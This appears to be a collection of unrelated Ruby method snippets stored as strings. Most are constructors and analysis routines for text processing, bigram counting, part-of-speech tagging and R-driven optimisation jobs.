"def initialize(&block)\n block.call(@msms_pipeline_analysis=MsmsPipelineAnalysis.new) if block\n end",
"def define_analysis(&block)\n @analysis = block\n end",
"def initialize(text)\n @text = text\n @sentences = []\n @result = {}\n @text.gsub!(\"\\n\", '')\n get_sentences\n get_words\n print_concordance\n end",
"def initialize(text)\n @text = text\n @nr_of_words = @text.nr_of_words\n @phrase_length = Ca::Config.instance.google_phrase_lenght\n @result = false\n end",
"def initialize(text)\n @text = text.dup\n @paragraphs = text.split(/\\n\\s*\\n\\s*/)\n @sentences = Lingua::EN::Sentence.sentences(@text)\n @words = []\n @frequencies = {}\n @frequencies.default = 0\n @syllables = 0\n @complex_words = 0\n count_words\n end",
"def analysis\n @analysis || {}\n end",
"def init\n if super\n @offset = 0\n @sg = ITALY\n self\n end\n end",
"def initialize\n @amplitude = {}\n @mixpanel = {}\n @appmetrica = {}\n @appsflyer = {}\n end",
"def initialize_analysis_job(analysis, analysis_job_id, options)\n analysis_job = Job.find(analysis_job_id)\n analysis.run_flag = true\n\n # add in the default problem/algorithm options into the analysis object\n # anything at at the root level of the options are not designed to override the database object.\n analysis.problem = options[:problem].deep_merge(analysis.problem) if analysis.problem\n\n # save other run information in another object in the analysis\n analysis_job.start_time = Time.now\n analysis_job.status = 'started'\n analysis_job.run_options = options.reject { |k, _| [:problem, :data_points, :output_variables].include?(k.to_sym) }\n analysis_job.save!\n\n # Clear out any former results on the analysis\n analysis.results ||= {} # make sure that the analysis results is a hash and exists\n\n analysis.results[options[:analysis_type]] = {}\n\n # merge in the output variables and objective functions into the analysis object which are needed for problem execution\n if options[:output_variables]\n options[:output_variables].reverse_each { |v| analysis.output_variables.unshift(v) unless analysis.output_variables.include?(v) }\n analysis.output_variables.uniq!\n end\n\n # verify that the objective_functions are unique\n if analysis.problem && analysis.problem['algorithm'] && analysis.problem['algorithm']['objective_functions']\n analysis.problem['algorithm']['objective_functions']&.uniq!\n end\n\n # some algorithm specific data to be stored in the database\n # TODO: I have a feeling that this is not initalized in some cases -- so lazily initializing here\n @iteration ||= -1\n analysis['iteration'] = @iteration\n\n # save all the changes into the database\n analysis.save!\n\n # return the analysis job db object\n analysis_job\n end",
"def initialize(piggybank)\n @piggybank = piggybank\n @agent = piggybank.agent\n end",
"def initialize\n\t\t# Default values for query expansion\n\t\t@measure = \"jaccard\"\n\t\t@threshold_gap = 0.3 # Uses this to relax the threshold for PostgreSQL search \n\tend",
"def perform\n @analysis = Analysis.find(@analysis_id)\n\n # get the analysis and report that it is running\n @analysis_job = AnalysisLibrary::Core.initialize_analysis_job(@analysis, @analysis_job_id, @options)\n\n # reload the object (which is required) because the subdocuments (jobs) may have changed\n @analysis.reload\n\n logger.info \"Initializing analysis for #{@analysis.name} with UUID of #{@analysis.uuid}\"\n\n # make this a core method\n if !@analysis.problem['algorithm']['seed'].nil? && (@analysis.problem['algorithm']['seed'].is_a? Numeric)\n logger.info \"Setting R base random seed to #{@analysis.problem['algorithm']['seed']}\"\n @r.converse(\"set.seed(#{@analysis.problem['algorithm']['seed']})\")\n end\n\n selected_variables = Variable.pivots(@analysis.id) + Variable.variables(@analysis.id)\n logger.info \"Found #{selected_variables.count} variables to perturb\"\n\n # generate the probabilities for all variables as column vectors\n grouped = {}\n samples = {}\n var_types = []\n\n # get the probabilities\n logger.info \"Found #{selected_variables.count} variables\"\n\n i_var = 0\n selected_variables.each do |var|\n logger.info \"sampling variable #{var.name} for measure #{var.measure.name}\"\n variable_samples = nil\n # TODO: would be nice to have a field that said whether or not the variable is to be discrete or continuous.\n if var.uncertainty_type == 'discrete'\n variable_samples = var.static_value\n var_types << 'discrete'\n else\n variable_samples = var.static_value\n var_types << 'continuous'\n end\n\n # always add the data to the grouped hash even if it isn't used\n grouped[var.measure.id.to_s] = {} unless grouped.key?(var.measure.id)\n grouped[var.measure.id.to_s][var.id.to_s] = variable_samples\n\n # save the samples to the\n samples[var.id.to_s] = variable_samples\n\n var.r_index = i_var + 1 # r_index is 1-based\n var.save!\n\n i_var += 1\n end\n\n logger.info \"Samples are #{samples}\"\n number_of_runs = @analysis.problem['algorithm']['number_of_runs']\n logger.info \"Number of Runs is #{number_of_runs}\"\n\n (1..number_of_runs).each do |i|\n dp_name = \"Repeat Run Autogenerated #{i}\"\n dp = @analysis.data_points.new(name: dp_name)\n dp.set_variable_values = samples\n dp.save!\n\n logger.info(\"Generated datapoint #{dp.name} for analysis #{@analysis.name}\")\n end\n\n # Only set this data if the analysis was NOT called from another analysis\n unless @options[:skip_init]\n @analysis_job.end_time = Time.now\n @analysis_job.status = 'completed'\n @analysis_job.save!\n @analysis.reload\n end\n @analysis.save!\n\n logger.info \"Finished running analysis '#{self.class.name}'\"\n end",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def initialize\n\t\t@vida = 1\n\t\t@forca = 1\n\t\t@carisma = 1\n\t\t@arma = 1\n\tend",
"def initialize\n \n end",
"def analyze\n analyze_text\n @analyzed = true\n nil\n end",
"def show\n if (@analysis.done?)\n # TODO: Refactor, this is not nice here.\n As2Init.new(@analysis)\n end\n\n end",
"def initialize(plan)\n @scope = :global\n\t @plan = plan\n\t super()\n\t @plan_predicates = Array.new\n\t @neg_plan_predicates = Array.new\n\tend",
"def init\n # import text files\n @target_array = acquire_target_array\n @element_array_list = acquire_element_array_list\n\n # set count\n @init_count = acquire_element_init_count(@element_array_list)\n @temp_count = acquire_element_temp_count(@element_array_list)\n\n self\n end",
"def initialize\n @log = Logger.new(STDOUT)\n @log.level = Logger::INFO\n self.load_config\n self.init_settings\n @assemblers = []\n self.load_assemblers\n end",
"def set_analysis\n @analysis = params[:id] ? Analysis.find(params[:id]) : Analysis.new(analysis_params)\n end",
"def initialize\n initialize!\n end",
"def initialize\n initialize!\n end",
"def initialize()\n #@ch = Concept.init_concept_hash()\n #Indexer.initialize_dict()\n #@ch = Indexer.init_concept_hash\n end",
"def initialize(options={})\n @ram = options[:ram]\n @io = options[:io] || HighLine.new\n @pc = 0\n end",
"def initialize(ann_anime)\n\t\t@ann_anime = ann_anime\n\n\t\t# information available from detail\n\t\t@info = Hash.new\n\t\t@info[:title] = \"Main title\"\n\t\t@info[:synopsis] = \"Plot Summary\"\n\t\t@info[:num_episodes] = \"Number of episodes\"\n\t\t@info[:genres] = \"Genres\"\n\t\t@info[:themes] = \"Themes\"\n\t\t@info[:vintage] = \"Vintage\"\n\t\t@info[:op_theme] = \"Opening Theme\"\n\t\t@info[:ed_theme] = \"Ending Theme\"\n\n\t\t# create methods\n\t\t@info.each do |name, key|\n\t\t\tcreate_method(name) do \n\t\t\t\tinfo = find_info(key)\n\t\t\t\treturn nil if info.nil?\n\t\t\t\tinfo.map do |i|\n\t\t\t\t\ti.content\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\tend",
"def run\n @options[:hmes_frags] = File.expand_path @options[:hmes_frags]\n @options[:bfr_frags] = File.expand_path @options[:bfr_frags]\n analysis = Implementer.new(@options)\n analysis.run\n end",
"def initialize text\n @filters = Despamilator::Filter.new text\n end",
"def initialize\n init\n end",
"def initialize(grammar)\n @arrowhead = \"normal\"\n @rankdir = \"LR\"\n @marked_states = nil\n @grammar = nil\n @grammar = grammar\n end",
"def initialize\n\t\t@tokenizer = Lexer.new # why the defined method is initialize and the called method is new mystifies me\n\t\t@token = nil\n\t\t@blocklevel = 0\n\t\t@node = nil\n\t\t@sav = nil\n\tend",
"def initialize\n question_array = Wordwise::CLI.question_array\n @word = question_array[0][0]\n @def = question_array[1][0]\n @defs = question_array[1].shuffle\n @origin = question_array[2]\n @@all << self\n end",
"def process_init()\n super()\n\n @total_campgrounds = []\n @counters = {\n location: [],\n at_a_glance: []\n }\n end",
"def initialize(repository, analysis = nil, **kw_args)\n # If no Analysis is passed, generate one.\n analysis ||= HowIs.generate_analysis(repository: repository, **kw_args)\n\n # Used by to_html, to_json, etc.\n @analysis = analysis\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def initialize\n @max_buckets = 8\n # TODO: some gradient descent to choose this number\n @min_support = 0.07\n @num_top_grams = 250\n end",
"def perform\n @analysis = Analysis.find(@analysis_id)\n\n # get the analysis and report that it is running\n @analysis_job = AnalysisLibrary::Core.initialize_analysis_job(@analysis, @analysis_job_id, @options)\n\n # reload the object (which is required) because the subdocuments (jobs) may have changed\n @analysis.reload\n\n # Make the analysis directory if it doesn't already exist\n FileUtils.mkdir_p analysis_dir(@analysis.id) unless Dir.exist? analysis_dir(@analysis.id)\n\n # create an instance for R\n @r = AnalysisLibrary::Core.initialize_rserve(APP_CONFIG['rserve_hostname'],\n APP_CONFIG['rserve_port'])\n logger.info 'Setting up R for GA Run'\n # Initialize some variables that are in the rescue/ensure blocks\n cluster = nil\n begin\n @r.converse(\"setwd('#{APP_CONFIG['sim_root_path']}')\")\n\n # make this a core method\n if !@analysis.problem['algorithm']['seed'].nil? && (@analysis.problem['algorithm']['seed'].is_a? Numeric)\n logger.info \"Setting R base random seed to #{@analysis.problem['algorithm']['seed']}\"\n @r.converse(\"set.seed(#{@analysis.problem['algorithm']['seed']})\")\n end\n # R libraries needed for this algorithm\n @r.converse 'library(rjson)'\n @r.converse 'library(R.utils)'\n @r.converse 'library(parallel)'\n @r.converse 'library(doParallel)'\n @r.converse 'library(NRELGA)'\n\n # At this point we should really setup the JSON that can be sent to the worker nodes with everything it needs\n # This would allow us to easily replace the queuing system with rabbit or any other json based versions.\n\n master_ip = 'localhost'\n\n logger.info(\"Master ip: #{master_ip}\")\n logger.info('Starting GA Run')\n\n # Quick preflight check that R, MongoDB, and Rails are working as expected. Checks to make sure\n # that the run flag is true.\n\n # TODO: preflight check -- need to catch this in the analysis module\n if @analysis.problem['algorithm']['maxiter'].nil? || (@analysis.problem['algorithm']['maxiter']).zero?\n raise 'Number of max iterations was not set or equal to zero (must be 1 or greater)'\n end\n\n if @analysis.problem['algorithm']['popSize'].nil? || (@analysis.problem['algorithm']['popSize']).zero?\n raise 'Must have number of samples to discretize the parameter space'\n end\n\n if @analysis.problem['algorithm']['elitism'] < 0 || @analysis.problem['algorithm']['elitism'] > 1\n raise 'elitism must be 0 <= elitism <= 1'\n end\n\n if @analysis.problem['algorithm']['pcrossover'] < 0 || @analysis.problem['algorithm']['pcrossover'] > 1\n raise 'pcrossover must be 0 <= pcrossover <= 1'\n end\n\n if @analysis.problem['algorithm']['pmutation'] < 0 || @analysis.problem['algorithm']['pmutation'] > 1\n raise 'pmutation must be 0 <= pmutation <= 1'\n end\n\n # TODO: add test for not \"minkowski\", \"maximum\", \"euclidean\", \"binary\", \"manhattan\"\n # if @analysis.problem['algorithm']['norm_type'] != \"minkowski\", \"maximum\", \"euclidean\", \"binary\", \"manhattan\"\n # raise \"P Norm must be non-negative\"\n # end\n\n if @analysis.problem['algorithm']['p_power'] <= 0\n raise 'P Norm must be non-negative'\n end\n\n # exit on guideline 14 is no longer true/false. its 0,1,2,3\n # @analysis.exit_on_guideline_14 = @analysis.problem['algorithm']['exit_on_guideline_14'] == 1 ? true : false\n if [0, 1, 2, 3].include? @analysis.problem['algorithm']['exit_on_guideline_14']\n @analysis.exit_on_guideline_14 = @analysis.problem['algorithm']['exit_on_guideline_14'].to_i\n logger.info \"exit_on_guideline_14 is #{@analysis.exit_on_guideline_14}\"\n else\n @analysis.exit_on_guideline_14 = 0\n logger.info \"exit_on_guideline_14 is forced to #{@analysis.exit_on_guideline_14}\"\n end\n @analysis.save!\n logger.info(\"exit_on_guideline_14: #{@analysis.exit_on_guideline_14}\")\n\n @analysis.problem['algorithm']['objective_functions'] = [] unless @analysis.problem['algorithm']['objective_functions']\n @analysis.save!\n logger.info(\"exit_on_guideline_14: #{@analysis.exit_on_guideline_14}\")\n\n # check to make sure there are objective functions\n if @analysis.output_variables.count { |v| v['objective_function'] == true }.zero?\n raise 'No objective functions defined'\n end\n\n # find the total number of objective functions\n if @analysis.output_variables.count { |v| v['objective_function'] == true } != @analysis.problem['algorithm']['objective_functions'].size\n raise 'Number of objective functions must equal between the output_variables and the problem definition'\n end\n\n pivot_array = Variable.pivot_array(@analysis.id, @r)\n logger.info \"pivot_array: #{pivot_array}\"\n selected_variables = Variable.variables(@analysis.id)\n logger.info \"Found #{selected_variables.count} variables to perturb\"\n\n # discretize the variables using the LHS sampling method\n @r.converse(\"print('starting lhs to discretize the variables')\")\n logger.info 'starting lhs to discretize the variables'\n\n lhs = AnalysisLibrary::R::Lhs.new(@r)\n samples, var_types, mins_maxes, var_names = lhs.sample_all_variables(selected_variables, 3)\n\n # Result of the parameter space will be column vectors of each variable\n logger.info \"Samples are #{samples}\"\n logger.info \"mins_maxes: #{mins_maxes}\"\n logger.info \"var_names: #{var_names}\"\n logger.info(\"variable types are #{var_types}\")\n\n if samples.empty? || samples.size <= 1\n logger.info 'No variables were passed into the options, therefore exit'\n raise \"Must have more than one variable to run algorithm. Found #{samples.size} variables\"\n end\n\n if var_names.empty? || var_names.empty?\n logger.info 'No variables were passed into the options, therefore exit'\n raise \"Must have at least one variable to run algorithm. Found #{var_names.size} variables\"\n end\n\n unless var_types.all? { |t| t.casecmp('continuous').zero? }\n logger.info 'Must have all continous variables to run algorithm, therefore exit'\n raise \"Must have all continous variables to run algorithm. Found #{var_types}\"\n end\n\n # Start up the cluster and perform the analysis\n # cluster = AnalysisLibrary::R::Cluster.new(@r, @analysis.id)\n # unless cluster.configure\n # raise 'could not configure R cluster'\n # end\n\n @r.converse(\"cat('max_queued_jobs: #{APP_CONFIG['max_queued_jobs']}')\")\n worker_ips = {}\n if @analysis.problem['algorithm']['max_queued_jobs']\n if @analysis.problem['algorithm']['max_queued_jobs'] == 0\n logger.info 'MAX_QUEUED_JOBS is 0'\n raise 'MAX_QUEUED_JOBS is 0'\n elsif @analysis.problem['algorithm']['max_queued_jobs'] > 0\n worker_ips[:worker_ips] = ['localhost'] * @analysis.problem['algorithm']['max_queued_jobs']\n logger.info \"Starting R queue to hold #{@analysis.problem['algorithm']['max_queued_jobs']} jobs\"\n end\n elsif !APP_CONFIG['max_queued_jobs'].nil?\n worker_ips[:worker_ips] = ['localhost'] * APP_CONFIG['max_queued_jobs'].to_i\n logger.info \"Starting R queue to hold #{APP_CONFIG['max_queued_jobs']} jobs\"\n else\n raise 'could not start the cluster (cluster size not set correctly)'\n end\n\n # logger.info \"Cluster Started flag is #{cluster.started}\"\n # maxiter is the max number of iterations to calculate\n # varNo is the number of variables (ncol(vars))\n # popSize is the number of sample points in the variable (nrow(vars))\n # epsilongradient is epsilon in numerical gradient calc\n\n # convert to float because the value is normally an integer and rserve/rserve-simpler only handles maxint\n @analysis.problem['algorithm']['failed_f_value'] = @analysis.problem['algorithm']['failed_f_value'].to_f\n @r.command(master_ips: master_ip,\n ips: worker_ips[:worker_ips],\n vartypes: var_types,\n varnames: var_names,\n varseps: mins_maxes[:eps],\n mins: mins_maxes[:min],\n maxes: mins_maxes[:max],\n normtype: @analysis.problem['algorithm']['norm_type'],\n ppower: @analysis.problem['algorithm']['p_power'],\n objfun: @analysis.problem['algorithm']['objective_functions'],\n popSize: @analysis.problem['algorithm']['popSize'],\n run: @analysis.problem['algorithm']['run'],\n maxFitness: @analysis.problem['algorithm']['maxFitness'],\n maxiter: @analysis.problem['algorithm']['maxiter'],\n pcrossover: @analysis.problem['algorithm']['pcrossover'],\n pmutation: @analysis.problem['algorithm']['pmutation'],\n elitism: @analysis.problem['algorithm']['elitism'],\n epsilongradient: @analysis.problem['algorithm']['epsilon_gradient'],\n debug_messages: @analysis.problem['algorithm']['debug_messages'],\n failed_f: @analysis.problem['algorithm']['failed_f_value']) do\n %{\n rails_analysis_id = \"#{@analysis.id}\"\n rails_sim_root_path = \"#{APP_CONFIG['sim_root_path']}\"\n rails_ruby_bin_dir = \"#{APP_CONFIG['ruby_bin_dir']}\"\n rails_mongodb_name = \"#{AnalysisLibrary::Core.database_name}\"\n rails_mongodb_ip = \"#{master_ip}\"\n rails_run_filename = \"#{@options[:run_data_point_filename]}\"\n rails_create_dp_filename = \"#{@options[:create_data_point_filename]}\"\n rails_root_path = \"#{Rails.root}\"\n rails_host = \"#{APP_CONFIG['os_server_host_url']}\"\n r_scripts_path = \"#{APP_CONFIG['r_scripts_path']}\"\n rails_exit_guideline_14 = \"#{@analysis.exit_on_guideline_14}\"\n\n init <- function(x){\n ruby_command <- \"cd #{APP_CONFIG['sim_root_path']} && #{APP_CONFIG['ruby_bin_dir']}/bundle exec ruby\"\n y <- paste(ruby_command,\" #{APP_CONFIG['sim_root_path']}/worker_init_final.rb -h #{APP_CONFIG['os_server_host_url']} -a #{@analysis_id} -s 'initialize'\",sep=\"\")\n print(paste(\"Run command\",y))\n z <- system(y,intern=TRUE)\n z\n }\n init\n source(paste(r_scripts_path,'/functions.R',sep=''))\n source(paste(r_scripts_path,'/ga.R',sep=''))\n }\n end\n logger.info 'Returned from rserve ga block'\n # TODO: find any results of the algorithm and save to the analysis\n rescue StandardError, ScriptError, NoMemoryError => e\n log_message = \"#{__FILE__} failed with #{e.message}, #{e.backtrace.join(\"\\n\")}\"\n logger.error log_message\n @analysis.status_message = log_message\n @analysis.save!\n @analysis_job.status = 'completed'\n @analysis_job.save!\n @analysis.reload\n @analysis.save!\n ensure\n # ensure that the cluster is stopped\n logger.info 'Executing ga.rb ensure block'\n begin\n # cluster.stop if cluster\n rescue StandardError, ScriptError, NoMemoryError => e\n # logger.error \"Error executing cluster.stop, #{e.message}, #{e.backtrace}\"\n end\n # logger.info 'Successfully executed cluster.stop'\n\n # Post process the results and jam into the database\n best_result_json = \"#{APP_CONFIG['sim_root_path']}/analysis_#{@analysis.id}/best_result.json\"\n if File.exist? best_result_json\n begin\n logger.info('read best result json')\n temp2 = File.read(best_result_json)\n temp = JSON.parse(temp2, symbolize_names: true)\n logger.info(\"temp: #{temp}\")\n @analysis.results[@options[:analysis_type]]['best_result'] = temp\n @analysis.save!\n logger.info(\"analysis: #{@analysis.results}\")\n rescue StandardError => e\n logger.error 'Could not save post processed results for bestresult.json into the database'\n end\n end\n\n # Post process the results and jam into the database\n converge_flag_json = \"#{APP_CONFIG['sim_root_path']}/analysis_#{@analysis.id}/convergence_flag.json\"\n if File.exist? converge_flag_json\n begin\n logger.info('read converge_flag.json')\n temp2 = File.read(converge_flag_json)\n temp = JSON.parse(temp2, symbolize_names: true)\n logger.info(\"temp: #{temp}\")\n @analysis.results[@options[:analysis_type]]['convergence_flag'] = temp\n @analysis.save!\n logger.info(\"analysis: #{@analysis.results}\")\n rescue StandardError => e\n logger.error 'Could not save post processed results for converge_flag.json into the database'\n end\n end\n\n # Only set this data if the analysis was NOT called from another analysis\n unless @options[:skip_init]\n @analysis_job.end_time = Time.now\n @analysis_job.status = 'completed'\n @analysis_job.save!\n @analysis.reload\n end\n @analysis.save!\n\n logger.info \"Finished running analysis '#{self.class.name}'\"\n end\n end",
"def initialize(cfg)\n @scoring = Scoring::Methods[cfg['scoring']]\n @tapecount = cfg['tapecount'].to_i\n @tiebreak = cfg['tiebreak'] # TODO: use\n\n # construct a hill of dummy programs\n\n nprogs = cfg['size'].to_i\n\n @progs = {}\n @hill = Array.new(nprogs)\n\n (0 .. nprogs-1).each do |id|\n prog = \"dummy-#{id}\"\n @progs[prog] = id\n @hill[id] = prog\n end\n\n # construct initial dummy results\n\n @results = ResultMatrix.new(nprogs, @tapecount)\n (0 .. nprogs-2).each do |idA|\n (idA+1 .. nprogs-1).each { |idB| @results[idA, idB] = Array.new(2*@tapecount, 0) }\n end\n end",
"def initialize\n\n\n\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def analysis\n @str = params[:text] ||= '解析対象の文字列'\n @words = Tag.counter(Tag.generate(@str))\n end",
"def initialize(frames = 1024)\n $frames = Frame.new(1024)\n $bm = Bitmap.new(1024)\n\n init_segment_table\n end",
"def initialize(income_expense_report)\n init_chart_labels(income_expense_report)\n init_graphs(income_expense_report)\n #do_test()\n end",
"def initialize(label)\n\n # pass a new engine with name :knowledge_base_engine to the super class\n super KnowledgeBase::engine label\n\n # instantiate variables\n @engine_has_matched = false\n @yml_locations = nil\n\n @question_rules = Array.new\n @result_rules = Array.new\n @fact_rules = Array.new\n @triggered_rules = Array.new\n @start_rules = Array.new\n @rules = {}\n\n end",
"def initialize\n\t\tsystem \"clear\"\n\t\tputs \"Lets play hangman!\"\n \t\t@guess_count = 0\n \t\t@game_status = false\n \t\t@guessed_letters=[]\n \t\t@guessing_word=[]\n \tend",
"def analyzer(analyzer)\n @analyzer = analyzer\n self\n end",
"def initialize(grammar)\n @marked_states = nil\n @state_counter = 0\n @state_number_translator = nil\n @grammar = nil\n @grammar = grammar\n end",
"def initialize(text)\n\n tagger_model = \"pt-pos-perceptron.bin\"\n if tagger_model == \"pt-pos-maxent.bin\"\n @article_tags = ['ART']\n @verb_tags = ['V']\n @auxiliary_verb_tags = ['VAUX']\n @participle_tags = ['PCP']\n @noun_tags = ['N', 'NPROP']\n @adjective_tags = ['ADJ']\n @adverb_tags = ['ADV', 'ADV-KS' 'ADV-KS-REL']\n @pronoun_tags = ['PROPESS', 'PROSUB', 'PROADJ', 'PRO-KS', 'PRO-KS-REL', ]\n @numeral_tags = ['NUM']\n @conjunction_tags = ['KS', 'KC']\n @preposition_tags = ['PREP', 'PREP+PROPESS', 'PREP+ART']\n @interjection_tags = ['IN']\n @denotative_word_tags = ['PDEN']\n @content_word_tags = @verb_tags + @noun_tags + @adjective_tags + @adverb_tags\n @function_word_tags = @article_tags + @preposition_tags + @pronoun_tags + @conjunction_tags + @interjection_tags\n\n @functions_as_noun_tags = ['N', 'NPROP', 'PROSUB']\n @functions_as_adjective_tags = ['ADJ', 'PROADJ']\n @punctuation_tags = ['PU']\n else\n @article_tags = ['art']\n @finito_tags = ['v-fin']\n @infinitive_tags = ['v-inf']\n @participle_tags = ['v-pcp']\n @gerundio_tags = ['v-ger']\n @noun_tags = ['n', 'prop']\n @adjective_tags = ['adj', 'n-adj']\n @adverb_tags = ['adv']\n @pronoun_tags = ['pron-pers', 'pron-indp']\n @denotative_word_tags = ['pron-det']\n @numeral_tags = ['num']\n @preposition_tags = ['prp']\n @conjunction_tags = ['conj-s', 'conj-c']\n @interjection_tags = ['intj']\n @punctuation_tags = ['punc']\n @functions_as_noun_tags = ['n', 'nprop']\n @functions_as_adjective_tags = ['adj', 'n-adj']\n @verb_tags = @finito_tags + @infinitive_tags + @participle_tags + @gerundio_tags\n @content_word_tags = @verb_tags + @noun_tags + @adjective_tags + @adverb_tags\n @function_word_tags = @article_tags + @preposition_tags + @pronoun_tags + @conjunction_tags + @interjection_tags\n end\n\n @tagger = OpenNLP::POSTaggerME.new(tagger_model)\n @tokenizer = OpenNLP::TokenizerME.new(\"pt-token.bin\")\n\n @tokens = @tokenizer.tokenize(text.gsub(/(\\p{Punct})/,\" \\\\1 \"))\n @part_of_speech = @tagger.tag(@tokens).to_a\n end",
"def initialize(grid) # new objects of class BB will be created by passing a grid to init method\n\t\t@grid = grid # usual init assignment of instance to local/self\n\tend",
"def initialize()\n end",
"def set_analyzer\n #@analyzer = Analyzer.find(params[:id])\n end",
"def initialize\n \n end",
"def initialize\n @consistency_checker = ConsistencyChecker.new\n @grammar_tester = GrammarTest.new\n @fsf_learner = FewestSetFeatures.new\n @mmr_learner = MaxMismatchRanking.new\n @step_type = INDUCTION\n end",
"def set_antibiogram\n\t\t\t@antibiogram = Antibiogram.find(params[:id])\n\t\tend",
"def initialize(alma:, solr:)\n @alma = alma\n @solr = solr # Spectrum::BibRecord\n @holdings = load_holdings\n end",
"def initialize() end",
"def initialize\n @formatter = Formatter::Text\n @levels = Report::DEFAULT_LEVELS\n @analyzers = REQUIRED_ANALYZERS.dup\n\n Analyze.constants.each do |c|\n const = Analyze.const_get(c)\n\n @analyzers << const unless @analyzers.include?(const)\n end\n end",
"def init; end",
"def init; end",
"def init; end",
"def init; end",
"def initialize()\n\t\tend",
"def initialize\n\t\t\n\tend",
"def initialize(model_sentence, bank)\n @tagger = EngTagger.new\n @poem = model_sentence.capitalize\n @model_sentence = model_sentence\n @model_tags = @tagger.get_readable(model_sentence).gsub(/\\w*\\//, \"\").downcase\n @word_bank = @tagger.add_tags(bank)\n end",
"def init_graph\n Graph.new(self, skip_track: :broad)\n end",
"def create_ramfs\n super\n end",
"def analysis(analysis_id); Analysis.new(@opts, get(\"#{link('analyses')}/#{analysis_id}\")); end",
"def initialize\n @results = []\n @sentences = []\n @words = []\n# @has_new_result = false\n# $stderr.puts \"DEBUG: #{__FILE__}\"\n end",
"def init\n end",
"def init\n end",
"def init\n end",
"def init (options={})\n\n\t\t @position_in_word = options[:position_in_word]\n\t\t @pos = options[:pos]\n\t \t @lemma = options[:lemma] \n\t \t @token = options[:token] \n\t \t @word_id = options[:word_id] \n\n end",
"def initialize\n end",
"def initialize\n # kosong\n end",
"def reset_analyzer filename, dpi, result, upstream\n @raw_barcode = []\n @raw_marked_votes = []\n @filename = filename\n @upstream = upstream\n @upstream.info \"Premier Ballot2: Processing #{filename}, Target DPI=#{dpi}\"\n self.target_dpi = dpi \n end",
"def initialize(argv)\n @max = 65535\n @ceil = nil\n @rank_type = 'count'\n @sort = false\n\n args = cli argv,\n '-m --max' => lambda{ |m| @max = m.to_i },\n '-r --rank' => lambda{ |r| @rank_type = r },\n '-s --sort' => lambda{ @sort = true },\n '-c --ceil' => lambda{ |c| @ceil = c.to_i },\n '-d --debug' => lambda{ $DEBUG = true },\n '-h --help' => lambda{ show_help }\n\n directory = args.first\n\n raise \"Directory does not exist -- #{directory}\" unless File.directory?(directory)\n\n @words = Analysis::Words.new(directory)\n end",
"def initialize(arguments = {})\n inner_letter = arguments.fetch(:inner_letter, \"\").upcase\n outer_letters = arguments.fetch(:outer_letters, \"\").upcase\n if pangram?(inner_letter + outer_letters)\n @all_letters = inner_letter + outer_letters\n @inner_letter = inner_letter\n @outer_letters = outer_letters\n else\n @all_letters = get_random_pangram.chars.uniq.join\n @inner_letter = @all_letters.chars.sample\n @outer_letters = @all_letters.gsub(@inner_letter,\"\")\n end\n load_word_list\n get_total_points\n end",
"def initialize(*args)\n @_benchmarks = {}\n @_caught_content = {}\n end",
"def initialize(input_text = nil)\n @engine = LexerEngine.new\n\t\t@queue = TokenQueue.new\n engine.input = input_text unless input_text.nil?\n end",
"def initialize\n \n end",
"def initialize\n \n end",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def initialize()\r\n\r\n end",
"def initialize\n\t\nend",
"def initialize\r\n load_word_catalog\r\n end",
"def initialize \n\t\t@alive #checking they're alive\n\t\t\tputs \"I am alive\"\n\t\t@health=150 #initialize that all mammals start at 150\n\t\tself\n\tend",
